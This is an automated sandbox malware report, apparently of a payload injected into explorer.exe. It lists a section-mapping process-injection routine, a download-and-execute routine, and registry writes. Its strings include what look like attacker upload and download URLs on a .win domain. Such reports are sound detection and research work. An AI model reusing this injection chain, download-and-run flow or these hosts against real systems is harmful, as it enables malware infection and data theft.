20160->20164 20161->20157 20162->20148 20165 e19406 20162->20165 20168 e1935c GetProcAddress 20163->20168 20166 e19461 20164->20166 20167 e1954d LoadLibraryExW 20164->20167 20165->20160 20169 e194e8 GetProcAddress 20166->20169 20170 e1946b 20166->20170 20167->20144 20172 e1956e 20167->20172 20168->20148 20171 e193a7 20168->20171 20169->20148 20173 e19548 20169->20173 20176 e19498 GetProcAddress 20170->20176 20171->20165 20174 e19683 LoadLibraryExW 20172->20174 20175 e1959d 20172->20175 20173->20167 20174->20144 20179 e196aa 20174->20179 20177 e19621 GetProcAddress 20175->20177 20178 e195a7 20175->20178 20176->20148 20180 e194e6 20176->20180 20177->20148 20181 e1967e 20177->20181 20184 e195d4 GetProcAddress 20178->20184 20182 e197c5 LoadLibraryExW 20179->20182 20183 e196d9 20179->20183 20180->20173 20181->20174 20182->20144 20187 e197e6 20182->20187 20185 e19760 GetProcAddress 20183->20185 20186 e196e3 20183->20186 20184->20148 20188 e1961f 20184->20188 20185->20148 20189 e197c0 20185->20189 20190 e19710 GetProcAddress 20186->20190 20191 e19815 20187->20191 20192 e198fb LoadLibraryExW 20187->20192 20188->20181 20189->20182 20190->20148 20194 e1975e 20190->20194 20195 e19899 GetProcAddress 20191->20195 20196 e1981f 20191->20196 20192->20144 20193 e1991c 20192->20193 20199 e19a31 LoadLibraryExW 20193->20199 20202 e19955 20193->20202 20203 e199cf GetProcAddress 20193->20203 20194->20189 20195->20148 20197 e198f6 20195->20197 20198 e1984c GetProcAddress 20196->20198 20197->20192 20198->20148 20200 e19897 20198->20200 20199->20144 20201 e19a52 20199->20201 20200->20197 20206 e19a81 20201->20206 20207 e19b67 LoadLibraryExW 20201->20207 20205 e19982 GetProcAddressForCaller 20202->20205 20203->20148 20204 e199cd 20203->20204 20204->20199 20205->20144 20205->20204 20208 e19b05 GetProcAddress 20206->20208 20209 e19a8b 20206->20209 20207->20144 20214 e19b88 20207->20214 20208->20148 20210 e19b62 20208->20210 20211 e19ab8 GetProcAddress 20209->20211 20210->20207 20211->20148 20212 e19b03 20211->20212 20212->20210 20213 e19c38 GetProcAddress 20213->20148 20213->20214 20214->20144 20216 e19bb7 20214->20216 20215 e19bee GetProcAddress 20215->20148 20215->20216 20216->20213 20216->20214 20216->20215 22244 e36a00 22247 e133a0 VariantClear 22244->22247 22246 e36a15 22247->22246 20262 e3061c 20264 e30641 20262->20264 20263 e32cbc __onexitinit 61 API calls 20263->20264 20264->20263 20265 e30681 20264->20265 20266 e3065f Sleep 20264->20266 20266->20264 20266->20265 22928 e233f0 22931 e23420 22928->22931 22929 e24500 5 API calls 22929->22931 22930 e2344b 22931->22929 22931->22930 22933 e23370 recv 22931->22933 22933->22931 19136 e29784 GetStartupInfoW 19137 e297b3 19136->19137 19181 e2f5ac HeapCreate 19137->19181 19140 e2981a 19186 e2adc0 19140->19186 19142 e29801 19146 e2eaec _FF_MSGBANNER 62 API calls 19142->19146 19143 e29806 19144 e2e88c _amsg_exit 62 API calls 19143->19144 19147 e29810 19144->19147 19146->19143 19149 e2e4dc malloc 3 API calls 19147->19149 19149->19140 19182 e2f5d4 GetVersion 19181->19182 19183 e297f4 19181->19183 19184 e2f5f8 19182->19184 19185 e2f5de HeapSetInformation 19182->19185 19183->19140 19183->19142 19183->19143 19184->19183 19185->19184 19293 e2e50c 19186->19293 19296 e2aaf8 EncodePointer 19293->19296 18039 e1c360 18040 e1c386 18039->18040 18052 e1c3a0 18039->18052 18041 e1c3a4 18040->18041 18042 e1c38d 18040->18042 18056 e0f200 18041->18056 18044 e1c3b0 18042->18044 18045 e1c394 18042->18045 18048 e0f200 106 API calls 18044->18048 18046 e1c3bc 18045->18046 18047 e1c39e DefWindowProcW 18045->18047 18050 e1c3c4 18046->18050 18053 e1c3d0 18046->18053 18047->18052 18054 e1c3a9 18048->18054 18051 e0f200 106 API calls 18050->18051 18051->18054 18053->18052 18069 e0f370 18053->18069 18054->18052 18057 e0f510 96 API calls 18056->18057 18058 e0f215 18057->18058 18059 e0f226 LocalAlloc 18058->18059 18060 e0f35f 18058->18060 18061 e0f354 LocalFree 18059->18061 18062 e0f247 wnsprintfW 18059->18062 18060->18054 18061->18060 18063 e0f2e4 18062->18063 18064 e0f288 RegOpenKeyW 18062->18064 18066 e0f349 LocalFree 18063->18066 18067 e0f2ed RegOpenKeyW 18063->18067 18064->18063 18065 e0f2a5 RegSetValueExW RegCloseKey 18064->18065 18065->18063 18066->18061 18067->18066 18068 e0f30a RegSetValueExW RegCloseKey 18067->18068 18068->18066 18070 e0f3b7 18069->18070 18071 e0f37d RegOpenKeyW 18069->18071 18073 e0f3c0 RegOpenKeyW 18070->18073 18074 e0f3fa 18070->18074 18071->18070 18072 e0f39a RegDeleteValueW RegCloseKey 18071->18072 18072->18070 18073->18074 18075 e0f3dd RegDeleteValueW RegCloseKey 18073->18075 18074->18052 18075->18074 20136 e2516b 20137 e25176 20136->20137 20138 e2517e CloseHandle 20137->20138 20139 e25189 20137->20139 20138->20139 20217 e1957b 20218 e1958b 20217->20218 20219 e19683 LoadLibraryExW 20218->20219 20220 e1959d 20218->20220 20223 e196a3 20219->20223 20224 e196aa 20219->20224 20221 e19621 GetProcAddress 20220->20221 20222 e195a7 20220->20222 20225 e19618 20221->20225 20226 e1967e 20221->20226 20229 e195d4 GetProcAddress 20222->20229 20227 e197c5 LoadLibraryExW 20224->20227 20228 e196d9 20224->20228 20225->20223 20226->20219 20227->20223 20232 e197e6 20227->20232 20230 e19760 GetProcAddress 20228->20230 20231 e196e3 20228->20231 20229->20225 20233 e1961f 20229->20233 20230->20225 20234 e197c0 20230->20234 20235 e19710 GetProcAddress 20231->20235 20236 e19815 20232->20236 20237 e198fb LoadLibraryExW 20232->20237 20233->20226 20234->20227 20235->20225 20239 e1975e 20235->20239 20240 e19899 GetProcAddress 20236->20240 20241 e1981f 20236->20241 20237->20223 20238 e1991c 20237->20238 20244 e19a31 LoadLibraryExW 20238->20244 20247 e19955 20238->20247 20248 e199cf GetProcAddress 20238->20248 20239->20234 20240->20225 20242 e198f6 20240->20242 20243 e1984c GetProcAddress 20241->20243 20242->20237 20243->20225 20245 e19897 20243->20245 20244->20223 20246 e19a52 20244->20246 20245->20242 20251 e19a81 20246->20251 20252 e19b67 LoadLibraryExW 20246->20252 20250 e19982 GetProcAddressForCaller 20247->20250 20248->20225 20249 e199cd 20248->20249 20249->20244 20250->20223 20250->20249 20253 e19b05 GetProcAddress 20251->20253 20254 e19a8b 20251->20254 20252->20223 20259 e19b88 20252->20259 20253->20225 20255 e19b62 20253->20255 20256 e19ab8 GetProcAddress 20254->20256 20255->20252 20256->20225 20257 e19b03 20256->20257 20257->20255 20258 e19c38 GetProcAddress 20258->20225 20258->20259 20259->20223 20261 e19bb7 20259->20261 20260 e19bee GetProcAddress 20260->20225 20260->20261 20261->20258 20261->20259 20261->20260

                                                                                                            Executed Functions

                                                                                                            Function 00E10740 Relevance: 145.7, APIs: 60, Strings: 23, Instructions: 432nativestringlibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 e10740-e1079c call e21f90 3 e107ab 0->3 4 e1079e-e107a9 0->4 5 e107b6-e10823 CreateProcessW 3->5 4->5 6 e11299 5->6 7 e10829-e108e6 GetModuleHandleW GetProcAddress * 5 GetCurrentProcess 5->7 8 e1129b-e112a2 6->8 9 e1125d-e11262 7->9 10 e108ec-e108f5 7->10 9->6 11 e11264-e11290 TerminateProcess CloseHandle * 2 9->11 10->9 12 e108fb-e10904 10->12 11->6 12->9 13 e1090a-e10913 12->13 13->9 14 e10919-e10922 13->14 14->9 15 e10928-e109cc NtCreateSection 14->15 15->9 16 e109d2-e10a52 GetCurrentProcess NtMapViewOfSection 15->16 17 e10a58-e10ac8 NtMapViewOfSection 16->17 18 e1124f-e11257 NtClose 16->18 19 e11239-e11249 NtUnmapViewOfSection 17->19 20 e10ace-e10b47 NtCreateSection 17->20 18->9 19->18 20->19 21 e10b4d-e10bd0 GetCurrentProcess NtMapViewOfSection 20->21 22 e10bd6-e10c46 NtMapViewOfSection 21->22 23 e1122b-e11233 NtClose 21->23 24 e11215-e11225 NtUnmapViewOfSection 22->24 25 e10c4c-e10e8b call e28b30 LoadLibraryW GetProcAddress * 2 lstrcpyW * 2 lstrcpyA * 9 NtCreateSection 22->25 23->19 24->23 25->24 28 e10e91-e10f14 GetCurrentProcess NtMapViewOfSection 25->28 29 e11207-e1120f NtClose 28->29 30 e10f1a-e10f8a NtMapViewOfSection 28->30 29->24 31 e111f1-e11201 NtUnmapViewOfSection 30->31 32 e10f90-e11010 call e28b30 CreateEventW 30->32 31->29 32->31 35 e11016-e11086 RtlCreateUserThread 32->35 36 e111e3-e111eb CloseHandle 35->36 37 e1108c-e110e1 WaitForSingleObject 35->37 36->31 38 e110e7-e1119f NtUnmapViewOfSection * 6 NtClose * 3 CloseHandle 37->38 39 e111a6-e111db TerminateProcess CloseHandle * 2 37->39 38->8 39->36
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Section$View$Close$lstrcpy$Unmap$AddressHandleProcProcess$Create$Current$Terminate$EventLibraryLoadModuleObjectSingleThreadUserWait
                                                                                                            • String ID: @$@$CloseHandle$GetProcAddress$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$NtClose$NtCreateSection$NtMapViewOfSection$NtUnmapViewOfSection$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect$h
                                                                                                            • API String ID: 1065732154-2887914861
                                                                                                            • Opcode ID: b3db4daf76245d26ee7c37ddfd04114db5d7fc73b353293878a34707a5285217
                                                                                                            • Instruction ID: a47f91716bcdcf9dbd900e824a68c79eb69dcabf3577580a8268aa944c9d6a44
                                                                                                            • Opcode Fuzzy Hash: b3db4daf76245d26ee7c37ddfd04114db5d7fc73b353293878a34707a5285217
                                                                                                            • Instruction Fuzzy Hash: 3C528D76218BC086EB71DF15F8983DAB7A0F788794F501616DA8993B68DF7DC188CB40
                                                                                                            Function 00E25D20 Relevance: 91.3, APIs: 48, Strings: 4, Instructions: 308synchronizationCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 264 e25d20-e25d4b OpenEventW 265 e25d51-e25d61 264->265 266 e2635e-e26367 264->266 267 e25d63-e25d77 OpenMutexW 265->267 268 e25d7c-e25d83 265->268 267->268 269 e25d91-e25da1 268->269 270 e25d85-e25d8b 268->270 272 e25da3 269->272 273 e25da7-e25dc6 OpenMutexW 269->273 270->269 271 e26340-e26346 270->271 276 e26353-e26358 CloseHandle 271->276 277 e26348-e2634d CloseHandle 271->277 274 e25df2-e25e14 CreateEventW 272->274 273->271 275 e25dcc-e25de2 WaitForSingleObject 273->275 278 e26322-e26328 274->278 279 e25e1a-e25e3d 274->279 275->274 280 e25de4-e25dec 275->280 276->266 277->276 278->271 283 e2632a-e2633a ReleaseMutex CloseHandle 278->283 281 e25e89-e25e90 279->281 282 e25e3f-e25e47 279->282 280->274 280->278 284 e25e96-e25eaa WaitForSingleObject 281->284 285 e2629e-e262b0 WaitForSingleObject 281->285 286 e25e53-e25e5d 282->286 283->271 284->285 287 e25eb0-e25eb8 284->287 289 e262b2-e262c7 SetEvent WaitForSingleObject 285->289 290 e262cd-e262d3 285->290 286->281 288 e25e5f-e25e7b WaitForSingleObject 286->288 291 e25ef0-e25f23 SleepEx WaitForSingleObject 287->291 292 e25eba-e25ece WaitForSingleObject 287->292 293 e25e87 288->293 294 e25e7d 288->294 289->290 295 e262d5-e262e0 CloseHandle 290->295 296 e262e9-e262ef 290->296 300 e25f36-e25f3d 291->300 301 e25f25-e25f32 WaitForSingleObject 291->301 292->291 298 e25ed0-e25ee7 WaitForSingleObject 292->298 293->286 299 e2630a-e26317 CloseHandle 294->299 295->296 302 e262f1-e262fc CloseHandle 296->302 303 e26305 296->303 304 e25ee9 298->304 305 e25eee 298->305 299->278 306 e25f52-e25f5a 300->306 307 e25f3f-e25f47 300->307 301->300 302->303 303->299 308 e26305 call e26dd0 303->308 304->285 305->281 311 e25f60-e25f68 306->311 312 e26285 306->312 309 e25f49 307->309 310 e25f4d 307->310 308->299 313 e25f6e-e25f7e call e26f30 309->313 314 e26287-e26299 WaitForSingleObject 310->314 311->312 311->313 312->285 317 e26257-e2625e 313->317 318 e25f84-e25fb1 setsockopt 313->318 314->281 321 e26283 317->321 322 e26260-e26267 317->322 319 e25fb7-e25fd5 CreateEventW 318->319 320 e26209-e2620f 318->320 319->320 323 e25fdb-e25ffc LocalAlloc 319->323 324 e26211-e26226 shutdown closesocket 320->324 325 e2622c-e26255 CloseHandle call e21f90 320->325 321->314 322->321 326 e26269-e26270 322->326 328 e26002-e26047 CreateThread 323->328 329 e261f5-e26200 CloseHandle 323->329 324->325 325->321 326->321 327 e26272-e26279 326->327 327->321 331 e2627b-e2627d ExitProcess 327->331 332 e261dc-e261e5 328->332 333 e2604d-e2605d GetTickCount 328->333 329->320 332->329 335 e261e7-e261ef LocalFree 332->335 336 e26064-e2606b 333->336 335->329 337 e26173-e261be shutdown closesocket SetEvent WaitForSingleObject call e26dd0 336->337 338 e26071-e26079 336->338 342 e261c3-e261d3 call e13ae0 CloseHandle 337->342 340 e26096-e260aa WaitForSingleObject 338->340 341 e2607b-e2608f WaitForSingleObject 338->341 344 e260b1-e260c5 WaitForSingleObject 340->344 345 e260ac 340->345 341->340 343 e26091 341->343 342->332 343->337 347 e260c7 344->347 348 e260cc-e260f6 call e23370 344->348 345->337 347->337 352 e260fa-e26102 348->352 353 e260f8 348->353 354 e26104-e2610f WSAGetLastError 352->354 355 e2612b-e26133 352->355 353->337 356 e26111-e26123 GetTickCount 354->356 357 e26129 354->357 358 e26163-e2616e SleepEx 355->358 359 e26135-e2613b GetTickCount 355->359 360 e26127 356->360 361 e26125 356->361 357->337 358->336 362 e26142-e2615f call e23370 359->362 360->355 361->337 362->358 365 e26161 362->365 365->362
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00E25D63
                                                                                                            • {DD700AA6-D197-4A4A-838A-B93EA96F236B}, xrefs: 00E25D2C
                                                                                                            • {8E8A4502-77C1-498F-9A62-1CFFC74945A4}, xrefs: 00E26249
                                                                                                            • {EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}, xrefs: 00E25DA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventMutexOpen$CreateObjectReleaseSingleWait
                                                                                                            • String ID: {7E105FD4-6112-4FB9-A722-91E984087449}${8E8A4502-77C1-498F-9A62-1CFFC74945A4}${DD700AA6-D197-4A4A-838A-B93EA96F236B}${EFC3ABD3-EC58-4FCB-B5F7-D01538741E91}
                                                                                                            • API String ID: 385723476-3844246474
                                                                                                            • Opcode ID: 3cfad946db56583bd56c67fe3a3e6adbf597aeab51e253aa603a430df7c46a88
                                                                                                            • Instruction ID: 58a60ad632336a13296f5c1c898e7bef204f918767355d97d612729f59886462
                                                                                                            • Opcode Fuzzy Hash: 3cfad946db56583bd56c67fe3a3e6adbf597aeab51e253aa603a430df7c46a88
                                                                                                            • Instruction Fuzzy Hash: 52F18631504AD0C6F724DF61F94835A73B1F7D4799F206A26D68AA2AB8CF7DC488CB01
                                                                                                            Function 00E053B0 Relevance: 61.6, APIs: 25, Strings: 10, Instructions: 310stringencryptionmemoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 531 e053b0-e053dc LocalAlloc 532 e053e8-e05593 lstrcpyW * 7 call e12160 531->532 533 e053de 531->533 541 e05599-e05616 CryptBinaryToStringW * 2 532->541 542 e0568e-e05693 532->542 534 e05a06-e05a0e 533->534 536 e05a10-e05a17 LocalFree 534->536 537 e05a1d-e05a25 534->537 536->537 539 e05a34-e05a3a 537->539 540 e05a27-e05a2e LocalFree 537->540 545 e05a47-e05a4d 539->545 546 e05a3c-e05a41 CloseHandle 539->546 540->539 541->542 547 e05618-e05686 call e28378 lstrcpyW 541->547 543 e05695 542->543 544 e0569f-e056ad call e052c0 542->544 543->534 554 e056b9-e056c6 LocalFree 544->554 555 e056af 544->555 549 e05a5a-e05a64 545->549 550 e05a4f-e05a54 CloseHandle 545->550 546->545 547->542 550->549 556 e056d1-e056d6 554->556 555->534 557 e057a8-e057b0 556->557 558 e056dc-e05766 call e19cb0 556->558 559 e057b2-e057b9 557->559 560 e057bb-e057bd RtlExitUserThread 557->560 565 e05773-e05797 WaitForSingleObject 558->565 566 e05768-e0576f 558->566 559->560 562 e057c3-e057c8 559->562 560->562 562->534 564 e057ce-e05839 call e291b0 call e12230 562->564 574 e05845-e058d2 call e28378 call e10740 564->574 575 e0583b 564->575 569 e057a3 565->569 570 e05799 565->570 566->565 568 e05771 566->568 568->557 569->556 570->534 580 e058d4 574->580 581 e058de-e05931 WaitForMultipleObjects WaitForSingleObject 574->581 575->534 580->534 582 e05933 581->582 583 e0593d-e05952 GetExitCodeProcess 581->583 582->534 584 e05954 583->584 585 e0595e-e05965 583->585 584->534 586 e05967-e0596f 585->586 587 e059aa-e059d7 WaitForSingleObject 585->587 588 e05971 586->588 589 e0597b-e0599f WaitForSingleObject 586->589 590 e059d9 587->590 591 e059db-e059e1 587->591 588->534 592 e059a1 589->592 593 e059a5 589->593 590->534 594 e059e3-e059e8 CloseHandle 591->594 595 e059ee-e059f4 591->595 592->534 593->562 594->595 596 e05a01 595->596 597 e059f6-e059fb CloseHandle 595->597 596->534 596->562 597->596
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • {7E105FD4-6112-4FB9-A722-91E984087449}, xrefs: 00E05409
                                                                                                            • {DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}, xrefs: 00E05863
                                                                                                            • {DD790A50-FBBA-44EC-A8E0-C3475C4234CA}, xrefs: 00E0549A
                                                                                                            • %s %s, xrefs: 00E05877
                                                                                                            • {B35D8F70-AFF8-4D2B-BFC7-10AF8714710B}, xrefs: 00E053E8
                                                                                                            • https://woo097878781.win/upload.php, xrefs: 00E0547D
                                                                                                            • Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0, xrefs: 00E05443, 00E056FE
                                                                                                            • https://woo097878781.win/64.EXE, xrefs: 00E05723
                                                                                                            • {2CE5F8BD-0511-45BE-87AB-414E34221A74}, xrefs: 00E05426, 00E05890
                                                                                                            • HWID_%s, xrefs: 00E0564F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$Local$BinaryCloseCryptFreeHandleString$Alloc
                                                                                                            • String ID: %s %s$HWID_%s$Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0$https://woo097878781.win/64.EXE$https://woo097878781.win/upload.php${2CE5F8BD-0511-45BE-87AB-414E34221A74}${7E105FD4-6112-4FB9-A722-91E984087449}${B35D8F70-AFF8-4D2B-BFC7-10AF8714710B}${DD790A50-FBBA-44EC-A8E0-C3475C4234CA}${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 1616647813-822792202
                                                                                                            • Opcode ID: 8237cef07f34f6c1e30c066254d37a39d5b06242a3309f111f42f1e23e4de9d6
                                                                                                            • Instruction ID: 679589874cac64a5a0d2ee8df993dcabba28860d769f3351b8b4cbeba4391c28
                                                                                                            • Opcode Fuzzy Hash: 8237cef07f34f6c1e30c066254d37a39d5b06242a3309f111f42f1e23e4de9d6
                                                                                                            • Instruction Fuzzy Hash: AA027136204FC1C6E724CB14F99439A73A1F7A8788F406A26DA4DA37A4DF3EC594CB01
                                                                                                            Function 00E04DA0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 218filestringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 860 e04da0-e04e0d 861 e04e65-e04e98 GetTempPathW 860->861 862 e04e0f-e04e2b SHGetKnownFolderPath 860->862 865 e04e9a-e04ebb call e28378 861->865 866 e04ebd-e04ebf 861->866 863 e04e34-e04e63 call e28378 CoTaskMemFree 862->863 864 e04e2d-e04e2f 862->864 872 e04ec4-e04ed5 863->872 867 e05219-e05221 864->867 865->872 866->867 873 e04ed7-e04f37 call e28378 CreateDirectoryW GetLastError 872->873 874 e04f4d-e04fd7 lstrcpyW call e28378 CreateFileW 872->874 873->874 879 e04f39-e04f44 873->879 880 e04fd9-e04ff1 GetLastError 874->880 881 e04ffa-e05030 WriteFile 874->881 879->874 882 e04f46-e04f48 879->882 880->881 883 e04ff3-e04ff5 880->883 884 e05032-e05041 881->884 885 e05043-e05053 CloseHandle 881->885 882->867 883->867 884->885 886 e05058-e0507e CloseHandle 884->886 885->867 887 e05183-e0520e CoInitializeEx call e28378 ShellExecuteW CoUninitialize 886->887 888 e05084-e05175 call e28378 CreateProcessW 886->888 895 e05214 887->895 893 e05177-e05179 888->893 894 e0517e 888->894 893->867 894->895 895->867
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorLastPath$DirectoryFileFolderFreeKnownTaskTemplstrcpy
                                                                                                            • String ID: "%s"$"%s" "%s"$%s\%s$%s\%s$Open$h
                                                                                                            • API String ID: 1929679530-3531242659
                                                                                                            • Opcode ID: c057f54f722bcf2c844584758c207069bac51c29aa03ca2c9ff8dcd663dc8fb8
                                                                                                            • Instruction ID: 8edc563ed916e33d53d3e2cb75474c5a6c7e39d61d4e19a40e48ad0816b772c9
                                                                                                            • Opcode Fuzzy Hash: c057f54f722bcf2c844584758c207069bac51c29aa03ca2c9ff8dcd663dc8fb8
                                                                                                            • Instruction Fuzzy Hash: 8FB14872218BC486EB30DB64F55839BB3A1F788794F805626D68D93BA8DF3DC558CB40
                                                                                                            Function 00E19CB0 Relevance: 35.3, APIs: 17, Strings: 3, Instructions: 340COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 896 e19cb0-e19d5a call e292b0 call e021c0 901 e19d82-e19d8d 896->901 902 e19d5c-e19d7d call e1b370 896->902 904 e19d9f-e19dad 901->904 908 e1a484-e1a48c 902->908 906 e19dd6-e19dde 904->906 907 e19daf-e19dd4 904->907 911 e19de0-e19e01 call e1b370 906->911 912 e19e06-e19e21 LocalAlloc 906->912 907->904 911->908 914 e19e27-e19e48 CreateEventW 912->914 915 e1a37d-e1a382 912->915 916 e1a372-e1a377 LocalFree 914->916 917 e19e4e-e19e7c LocalAlloc 914->917 918 e1a463-e1a47c call e1b370 915->918 919 e1a388-e1a3c0 call e1b3a0 LocalAlloc 915->919 916->915 921 e19e82-e19ea3 LocalAlloc 917->921 922 e1a364-e1a36c CloseHandle 917->922 918->908 930 e1a3c2-e1a3e3 call e1b370 919->930 931 e1a3e8-e1a461 call e1b3a0 call e039a0 call e28b30 call e1b3a0 call e1b370 919->931 925 e1a356-e1a35e LocalFree 921->925 926 e19ea9-e19f1d call e291b0 921->926 922->916 925->922 940 e19f23-e19f55 926->940 941 e1a348-e1a350 LocalFree 926->941 930->908 931->908 940->941 946 e19f5b-e19f8a 940->946 941->925 951 e19f90-e19fee 946->951 952 e1a33a 946->952 951->952 955 e19ff4-e1a001 951->955 952->941 956 e1a010 955->956 957 e1a003-e1a00e 955->957 958 e1a01b-e1a078 956->958 957->958 960 e1a32c 958->960 961 e1a07e-e1a091 958->961 960->952 962 e1a093-e1a0c7 961->962 963 e1a0ce-e1a0d6 961->963 962->963 964 e1a0f4-e1a127 963->964 965 e1a0d8-e1a0e0 963->965 968 e1a31e 964->968 970 e1a12d-e1a15d WaitForMultipleObjects 964->970 967 e1a0e6-e1a0ee 965->967 965->968 967->964 967->968 968->960 970->968 971 e1a163-e1a176 970->971 971->968 973 e1a17c-e1a1ac WaitForMultipleObjects 971->973 973->968 974 e1a1b2-e1a1f3 973->974 976 e1a1f5 974->976 977 e1a1fa-e1a22a call e293e0 974->977 976->968 980 e1a231-e1a24b 977->980 981 e1a22c 977->981 982 e1a24d-e1a252 980->982 981->968 982->968 983 e1a258-e1a269 982->983 984 e1a277-e1a279 983->984 985 e1a280-e1a2b0 WaitForMultipleObjects 984->985 986 e1a27b 984->986 987 e1a2b2 985->987 988 e1a2b4-e1a2bd 